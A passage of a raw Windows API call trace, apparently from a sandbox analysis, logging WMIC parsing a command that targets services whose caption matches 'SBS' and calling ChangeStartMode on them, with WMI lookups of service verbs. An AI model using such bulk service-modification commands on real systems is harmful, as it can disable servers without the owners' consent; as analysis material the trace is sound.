[7]=0x24)), ppvObject=0x3afa38 | out: ppvObject=0x3afa38*=0x6456d8) returned 0x0 [0123.722] GetCurrentThreadId () returned 0xc34 [0123.722] ??0CHString@@QAE@XZ () returned 0x3af9b8 [0123.722] IWbemClassObject:Get (in: This=0x6456d8, wszName="Namespace", lFlags=0, pVal=0x3af99c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3af99c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0123.722] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0123.722] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0123.722] IWbemClassObject:Get (in: This=0x6456d8, wszName="Locale", lFlags=0, pVal=0x3af99c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x627354, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3af99c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0123.722] lstrlenW (lpString="ms_409") returned 6 [0123.722] lstrlenW (lpString="ms_409") returned 6 [0123.722] IWbemClassObject:Get (in: This=0x6456d8, wszName="User", lFlags=0, pVal=0x3af99c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x627354, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3af99c*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0123.722] IWbemClassObject:Get (in: This=0x6456d8, wszName="Password", lFlags=0, pVal=0x3af99c*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3af99c*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0123.722] IWbemClassObject:Get (in: This=0x6456d8, wszName="Server", lFlags=0, pVal=0x3af99c*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3af99c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0123.722] lstrlenW (lpString=".") returned 1 [0123.722] lstrlenW (lpString=".") returned 1 [0123.723] IWbemClassObject:Get (in: This=0x6456d8, wszName="Authority", lFlags=0, pVal=0x3af99c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x627354, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3af99c*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0123.723] ??1CHString@@QAE@XZ () returned 0x74a66430 [0123.723] IUnknown:Release (This=0x6456d8) returned 0x1 [0123.723] GetCurrentThreadId () returned 0xc34 [0123.723] ??0CHString@@QAE@XZ () returned 0x3af9a8 [0123.723] IWbemClassObject:Get (in: This=0x645318, wszName="__RELPATH", lFlags=0, pVal=0x3af990*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3af990*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"Service\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0123.723] GetCurrentThreadId () returned 0xc34 [0123.723] ??0CHString@@QAE@XZ () returned 0x3af924 [0123.723] ??0CHString@@QAE@PBG@Z () returned 0x3af920 [0123.723] ??0CHString@@QAE@ABV0@@Z () returned 0x3af8a0 [0123.723] ?Empty@CHString@@QAEXXZ () returned 0x74a66430 [0123.723] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x818aa0 [0123.723] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0123.723] ?Left@CHString@@QBE?AV1@H@Z () returned 0x3af898 [0123.723] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x3af89c [0123.723] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x3af920 [0123.723] ??1CHString@@QAE@XZ () returned 0x1 [0123.723] ??1CHString@@QAE@XZ () returned 0x1 [0123.723] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x3af894 [0123.723] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x3af8a0 [0123.723] ??1CHString@@QAE@XZ () returned 0x1 [0123.723] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x818b00 [0123.723] ?Find@CHString@@QBEHPBG@Z () returned 0x7 [0123.723] ?Left@CHString@@QBE?AV1@H@Z () returned 0x3af898 [0123.723] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x3af89c [0123.723] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x3af920 [0123.723] ??1CHString@@QAE@XZ () returned 0x1 [0123.723] ??1CHString@@QAE@XZ () returned 0x1 [0123.723] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x3af894 [0123.723] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x3af8a0 [0123.723] ??1CHString@@QAE@XZ () returned 0x74a66430 [0123.723] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x74a66424 [0123.723] ??1CHString@@QAE@XZ () returned 0x74a66430 [0123.724] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0123.724] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0123.724] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0123.724] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x26 [0123.724] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x79 [0123.724] SysStringLen (param_1="\"") returned 0x1 [0123.724] IWbemServices:GetObject (in: This=0x620ae0, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x3af930*=0x0, ppCallResult=0x0 | out: ppObject=0x3af930*=0x645ab8, ppCallResult=0x0) returned 0x0 [0123.726] IWbemClassObject:Get (in: This=0x645ab8, wszName="Text", lFlags=0, pVal=0x3af8fc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3af8fc*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x62f500*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x623598, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0123.726] SafeArrayGetLBound (in: psa=0x62f500, nDim=0x1, plLbound=0x3af90c | out: plLbound=0x3af90c) returned 0x0 [0123.726] SafeArrayGetUBound (in: psa=0x62f500, nDim=0x1, plUbound=0x3af910 | out: plUbound=0x3af910) returned 0x0 [0123.726] SafeArrayGetElement (in: psa=0x62f500, rgIndices=0x3af928, pv=0x3af914 | out: pv=0x3af914) returned 0x0 [0123.726] SysStringLen (param_1="Service application management. ") returned 0x20 [0123.726] IUnknown:Release (This=0x645ab8) returned 0x0 [0123.726] ??1CHString@@QAE@XZ () returned 0x1 [0123.726] ??1CHString@@QAE@XZ () returned 0x74a66430 [0123.726] ??1CHString@@QAE@XZ () returned 0x74a66430 [0123.726] lstrlenW (lpString="Service application management. ") returned 32 [0123.726] lstrlenW (lpString="Service application management. ") returned 32 [0123.726] IUnknown:Release (This=0x645318) returned 0x0 [0123.727] ??1CHString@@QAE@XZ () returned 0x74a66430 [0123.727] lstrlenW (lpString="PATH") returned 4 [0123.727] lstrlenW (lpString="WHERE") returned 5 [0123.727] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0123.727] lstrlenW (lpString="WHERE") returned 5 [0123.727] lstrlenW (lpString="WHERE") returned 5 [0123.727] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0123.727] lstrlenW (lpString="/") returned 1 [0123.727] lstrlenW (lpString="caption LIKE '%SBS%'") returned 20 [0123.727] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%SBS%'", cchCount1=20, lpString2="/", cchCount2=1) returned 3 [0123.727] lstrlenW (lpString="-") returned 1 [0123.727] lstrlenW (lpString="caption LIKE '%SBS%'") returned 20 [0123.727] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%SBS%'", cchCount1=20, lpString2="-", cchCount2=1) returned 3 [0123.727] lstrlenW (lpString="caption LIKE '%SBS%'") returned 20 [0123.727] lstrlenW (lpString="caption LIKE '%SBS%'") returned 20 [0123.727] lstrlenW (lpString="/") returned 1 [0123.727] lstrlenW (lpString="CALL") returned 4 [0123.727] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0123.727] lstrlenW (lpString="-") returned 1 [0123.727] lstrlenW (lpString="CALL") returned 4 [0123.727] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0123.727] lstrlenW (lpString="CALL") returned 4 [0123.727] lstrlenW (lpString="CALL") returned 4 [0123.727] lstrlenW (lpString="GET") returned 3 [0123.727] lstrlenW (lpString="CALL") returned 4 [0123.727] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0123.727] lstrlenW (lpString="LIST") returned 4 [0123.727] lstrlenW (lpString="CALL") returned 4 [0123.727] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0123.727] lstrlenW (lpString="SET") returned 3 [0123.727] lstrlenW (lpString="CALL") returned 4 [0123.727] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0123.727] lstrlenW (lpString="CREATE") returned 6 [0123.727] lstrlenW (lpString="CALL") returned 4 [0123.727] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0123.727] lstrlenW (lpString="CALL") returned 4 [0124.031] lstrlenW (lpString="CALL") returned 4 [0124.031] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0124.031] lstrlenW (lpString="/") returned 1 [0124.031] lstrlenW (lpString="ChangeStartMode") returned 15 [0124.031] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="/", cchCount2=1) returned 3 [0124.031] lstrlenW (lpString="-") returned 1 [0124.031] lstrlenW (lpString="ChangeStartMode") returned 15 [0124.031] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="-", cchCount2=1) returned 3 [0124.031] lstrlenW (lpString="ChangeStartMode") returned 15 [0124.031] lstrlenW (lpString="ChangeStartMode") returned 15 [0124.031] GetCurrentThreadId () returned 0xc34 [0124.031] ??0CHString@@QAE@XZ () returned 0x3af1b4 [0124.032] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0124.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0x818b50, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0124.032] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0124.032] SysStringLen (param_1="SERVICE") returned 0x7 [0124.032] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0124.032] SysStringLen (param_1="'") returned 0x1 [0124.032] IWbemServices:GetObject (in: This=0x6205e0, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0x3af190*=0x0, ppCallResult=0x0 | out: ppObject=0x3af190*=0x645318, ppCallResult=0x0) returned 0x0 [0124.037] lstrlenW (lpString="CALL") returned 4 [0124.037] lstrlenW (lpString="CALL") returned 4 [0124.037] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0124.037] IWbemClassObject:Get (in: This=0x645318, wszName="Verbs", lFlags=0, pVal=0x3af148*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3af148*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x62f0e0*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x62f040, rgsabound=((cElements=0xa, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0124.039] SafeArrayGetLBound (in: psa=0x62f0e0, nDim=0x1, plLbound=0x3af158 | out: plLbound=0x3af158) returned 0x0 [0124.039] SafeArrayGetUBound (in: psa=0x62f0e0, nDim=0x1, plUbound=0x3af160 | out: plUbound=0x3af160) returned 0x0 [0124.039] SafeArrayGetElement (in: psa=0x62f0e0, rgIndices=0x3af168, pv=0x3af19c | out: pv=0x3af19c) returned 0x0 [0124.039] IWbemClassObject:Get (in: This=0x646ce0, wszName="Name", lFlags=0, pVal=0x3af138*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3af138*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0124.039] lstrlenW (lpString="StartService") returned 12 [0124.039] lstrlenW (lpString="ChangeStartMode") returned 15 [0124.039] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="StartService", cchCount2=12) returned 1 [0124.039] IUnknown:Release (This=0x646ce0) returned 0x1 [0124.039] SafeArrayGetElement (in: psa=0x62f0e0, rgIndices=0x3af168, pv=0x3af19c | out: pv=0x3af19c) returned 0x0 [0124.039] IWbemClassObject:Get (in: This=0x647210, wszName="Name", lFlags=0, pVal=0x3af138*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3af138*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0124.039] lstrlenW (lpString="StopService") returned 11 [0124.039] lstrlenW (lpString="ChangeStartMode") returned 15 [0124.039] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="StopService", cchCount2=11) returned 1 [0124.039] IUnknown:Release (This=0x647210) returned 0x1 [0124.039] SafeArrayGetElement (in: psa=0x62f0e0, rgIndices=0x3af168, pv=0x3af19c | out: pv=0x3af19c) returned 0x0 [0124.039] IWbemClassObject:Get (in: This=0x647750, wszName="Name", lFlags=0, pVal=0x3af138*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3af138*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PauseService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0124.040] lstrlenW (lpString="PauseService") returned 12 [0124.040] lstrlenW (lpString="ChangeStartMode") returned 15 [0124.040] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="PauseService", cchCount2=12) returned 1 [0124.040] IUnknown:Release (This=0x647750) returned 0x1 [0124.040] SafeArrayGetElement (in: psa=0x62f0e0, rgIndices=0x3af168, pv=0x3af19c | out: pv=0x3af19c) returned 0x0 [0124.040] IWbemClassObject:Get (in: This=0x647c90, wszName="Name", lFlags=0, pVal=0x3af138*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PauseService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3af138*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ResumeService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0124.040] lstrlenW (lpString="ResumeService") returned 13 [0124.040] lstrlenW (lpString="ChangeStartMode") returned 15 [0124.040] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="ResumeService", cchCount2=13) returned 1 [0124.042] IUnknown:Release (This=0x647c90) returned 0x1 [0124.042] SafeArrayGetElement (in: psa=0x62f0e0, rgIndices=0x3af168, pv=0x3af19c | out: pv=0x3af19c) returned 0x0 [0124.042] IWbemClassObject:Get (in: This=0x6481f8, wszName="Name", lFlags=0, pVal=0x3af138*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ResumeService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3af138*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InterrogateService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0124.042] lstrlenW (lpString="InterrogateService") returned 18 [0124.042] lstrlenW (lpString="ChangeStartMode") returned 15 [0124.042] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="InterrogateService", cchCount2=18) returned 1 [0124.042] IUnknown:Release (This=0x6481f8) returned 0x1 [0124.042] SafeArrayGetElement (in: psa=0x62f0e0, rgIndices=0x3af168, pv=0x3af19c | out: pv=0x3af19c) returned 0x0 [0124.042] IWbemClassObject:Get (in: This=0x648c00, wszName="Name", lFlags=0, pVal=0x3af138*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InterrogateService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3af138*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="UserControlService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0124.042] lstrlenW (lpString="UserControlService") returned 18 [0124.042] lstrlenW (lpString="ChangeStartMode") returned 15 [0124.042] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="UserControlService", cchCount2=18) returned 1 [0124.042] IUnknown:Release (This=0x648c00) returned 0x1 [0124.042] SafeArrayGetElement (in: psa=0x62f0e0, rgIndices=0x3af168, pv=0x3af19c | out: pv=0x3af19c) returned 0x0 [0124.042] IWbemClassObject:Get (in: This=0x64cc08, wszName="Name", lFlags=0, pVal=0x3af138*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="UserControlService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3af138*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Create", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0124.042] lstrlenW (lpString="Create") returned 6 [0124.042] lstrlenW (lpString="ChangeStartMode") returned 15 [0124.042] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="Create", cchCount2=6) returned 1 [0124.042] IUnknown:Release (This=0x64cc08) returned 0x1 [0124.042] SafeArrayGetElement (in: psa=0x62f0e0, rgIndices=0x3af168, pv=0x3af19c | out: pv=0x3af19c) returned 0x0 [0124.042] IWbemClassObject:Get (in: This=0x6508d8, wszName="Name", lFlags=0, pVal=0x3af138*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Create", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3af138*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Change", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0124.042] lstrlenW (lpString="Change") returned 6 [0124.042] lstrlenW (lpString="ChangeStartMode") returned 15 [0124.042] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="Change", cchCount2=6) returned 3 [0124.043] IUnknown:Release (This=0x6508d8) returned 0x1 [0124.043] SafeArrayGetElement (in: psa=0x62f0e0, rgIndices=0x3af168, pv=0x3af19c | out: pv=0x3af19c) returned 0x0 [0124.043] IWbemClassObject:Get (in: This=0x651560, wszName="Name", lFlags=0, pVal=0x3af138*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Change", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3af138*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ChangeStartMode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0124.043] lstrlenW (lpString="ChangeStartMode") returned 15 [0124.043] lstrlenW (lpString="ChangeStartMode") returned 15 [0124.043] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="ChangeStartMode", cchCount2=15) returned 2 [0124.043] GetCurrentThreadId () returned 0xc34 [0124.043] ??0CHString@@QAE@XZ () returned 0x3aefb4 [0124.043] IWbemClassObject:Get (in: This=0x651560, wszName="Description", lFlags=0, pVal=0x3aef84*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3aef84*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The ChangeStartMode method modifies the StartMode of a service. It returns an integer value of 0 if the service was successfully modified, 1 if the request is not supported, and any other number to indicate an error.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0124.043] ??1CHString@@QAE@XZ () returned 0x74a66430 [0124.043] IWbemClassObject:Get (in: This=0x651560, wszName="Parameters", lFlags=0, pVal=0x3af128*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3af128*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x62f260*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x623598, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0124.043] IWbemClassObject:Get (in: This=0x651560, wszName="VerbType", lFlags=0, pVal=0x3af0c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3af0c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0124.043] IWbemClassObject:Get (in: This=0x651560, wszName="Derivation", lFlags=0, pVal=0x3af0a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3af0a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ChangeStartMode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0124.044] lstrlenW (lpString="ChangeStartMode") returned 15 [0124.044] lstrlenW (lpString="ChangeStartMode") returned 15 [0124.044] SafeArrayGetLBound (in: psa=0x62f260, nDim=0x1, plLbound=0x3af15c | out: plLbound=0x3af15c) returned 0x0 [0124.044] SafeArrayGetUBound (in: psa=0x62f260, nDim=0x1, plUbound=0x3af178 | out: plUbound=0x3af178) returned 0x0 [0124.044] SafeArrayGetElement (in: psa=0x62f260, rgIndices=0x3af17c, pv=0x3af188 | out: pv=0x3af188) returned 0x0 [0124.044] IWbemClassObject:Get (in: This=0x6525f8, wszName="ParaId", lFlags=0, pVal=0x3af0d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3af0d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartMode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0124.044] IWbemClassObject:Get (in: This=0x6525f8, wszName="Type", lFlags=0, pVal=0x3af070*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3af070*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="STRING", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0124.044] IWbemClassObject:Get (in: This=0x6525f8, wszName="Default", lFlags=0, pVal=0x3af090*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3af090*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0124.044] GetCurrentThreadId () returned 0xc34 [0124.044] ??0CHString@@QAE@XZ () returned 0x3aefc4 [0124.044] IWbemClassObject:Get (in: This=0x6525f8, wszName="Qualifiers", lFlags=0, pVal=0x3aef4c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3aef4c*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x62f320*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x6234c8, rgsabound=((cElements=0x2, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0124.044] SafeArrayGetLBound (in: psa=0x62f320, nDim=0x1, plLbound=0x3aef7c | out: plLbound=0x3aef7c) returned 0x0 [0124.044] SafeArrayGetUBound (in: psa=0x62f320, nDim=0x1, plUbound=0x3aef90 | out: plUbound=0x3aef90) returned 0x0 [0124.044] SafeArrayGetElement (in: psa=0x62f320, rgIndices=0x3aef9c, pv=0x3aefbc | out: pv=0x3aefbc) returned 0x0 [0124.045] IWbemClassObject:Get (in: This=0x6528b0, wszName="Name", lFlags=0, pVal=0x3aef64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3aef64*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="In", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0124.045] IWbemClassObject:Get (in: This=0x6528b0, wszName="QualifierValue", lFlags=0, pVal=0x3aef3c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3aef3c*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x62f2f0*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x623448, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0124.045] SafeArrayGetLBound (in: psa=0x62f2f0, nDim=0x1, plLbound=0x3aef80 | out: plLbound=0x3aef80) returned 0x0 [0124.045] SafeArrayGetUBound (in: psa=0x62f2f0, nDim=0x1, plUbound=0x3aef60 | out: plUbound=0x3aef60) returned 0x0 [0124.045] lstrlenW (lpString="CIMTYPE") returned 7 [0124.045] lstrlenW (lpString="In") returned 2 [0124.045] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="CIMTYPE", cchCount2=7) returned 3 [0124.045] lstrlenW (lpString="read") returned 4 [0124.045] lstrlenW (lpString="In") returned 2 [0124.045] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="read", cchCount2=4) returned 1 [0124.045] lstrlenW (lpString="write") returned 5 [0124.045] lstrlenW (lpString="In") returned 2 [0124.045] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="write", cchCount2=5) returned 1 [0124.045] lstrlenW (lpString="In") returned 2 